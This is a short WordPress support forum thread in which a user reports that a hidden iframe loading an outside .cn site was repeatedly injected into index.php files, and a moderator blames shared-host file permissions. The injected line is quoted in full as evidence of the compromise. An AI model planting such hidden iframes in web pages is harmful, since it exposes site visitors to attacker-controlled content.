iframe injection into index.php

  • i have found an injection of a line:
    <iframe src=”https://xmanages.cn/in/&#8221; width=1 height=1 style=”visibility: hidden”></iframe>

    into the files index.php (of several directories) after i installed wordpress 2.6.2 for about 20 mins later.

    would anyone help me how to solve the security loopholes? in fact i found this injection also in 2.6.1. now i have deleted the lines manually. but i guess it will happen soon again just like when i have cleared in 2.6.1 it still came back.

    pls help me. thanx a million.

Viewing 1 replies (of 1 total)
  • Moderator Samuel Wood (Otto)

    (@otto42)

    www.remarpro.com Admin

    WordPress 2.6.2 has no known security holes. They probably got in through some other method.

    If you’re on a shared host, make sure that your permissions are set correctly. If they got in through some other site on the same host, and your permissions were wrong, then they could edit your files that way.

Viewing 1 replies (of 1 total)
  • The topic ‘iframe injection into index.php’ is closed to new replies.